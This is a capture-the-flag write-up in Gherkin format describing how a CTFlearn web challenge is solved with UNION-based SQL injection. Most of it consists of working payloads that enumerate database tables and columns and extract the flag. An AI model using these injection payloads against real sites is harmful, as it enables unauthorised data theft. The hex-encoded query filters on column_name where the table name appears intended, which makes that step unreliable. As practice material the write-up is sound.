## Version 2.0
## language: en

Feature:
  Site:
    ctflearn
  Category:
    Web
  User:
    mr_once
  Goal:
    Get the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
  Machine information:
    Given I am accessing the challenge at http://web.ctflearn.com/web8/
    And the description of the challenge is
    """
    I stumbled upon this website: http://web.ctflearn.com/web8/
    and I think they have the flag in their somewhere. UNION might
    be a helpful command
    """

  Scenario: Success:Matching the number of columns
    Given I know I should try a UNION attack
    When I try an injection of the form
    """
    -1 UNION SELECT 1 -- -
    """
    Then I can see no results were found
    And I keep adding numbers until som data gets displayed
    When I try
    """
    -1 UNION SELECT 1,2,3,4 -- -
    """
    Then I can see the page shows
    """
    Name: 2
    Breed: 1
    Color: 3
    """
    And I realize I can use columns 1,2 and 3 for the injection

  Scenario: Success:Getting the table names
    Given I know I can inject on columns 1,2 and 3
    When I look for the tables of the database
    """
    -1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables -- -
    """
    Then I can see an interesting table [evidemnce](table.png)

  Scenario: Fail:Getting w0w_y0u_f0und_m3 columns
    Given I found the table "w0w_y0u_f0und_m3"
    When I try to find it's columns
    """
    -1  UNION SELECT 1,column_name,3,4 FROM information_schema.columns\
      WHERE column_name=w0w_y0u_f0und_m3 -- -
    """
    Then I get nothing

  Scenario: Success:Getting w0w_y0u_f0und_m3 columns with hexadecimal
    Given that the above method didn't work
    When I tried using "w0w_y0u_f0und_m3" in hexadecimal
    """
    -1  UNION SELECT 1,column_name,3,4 FROM information_schema.columns\
      WHERE column_name=0x7730775f7930755f6630756e645f6d33 -- -
    """
    Then I get the columns of the table [evidence](columns.png)

  Scenario: Success:Getting the flag
    Given that now I know both the table and the column
    When I try
    """
    -1 UNION SELECT 1,f0und_m3,3,4 FROM w0w_y0u_f0und_m3 -- -
    """
    Then I get the flag [evidence](flag.png)
    And I solve the challenge
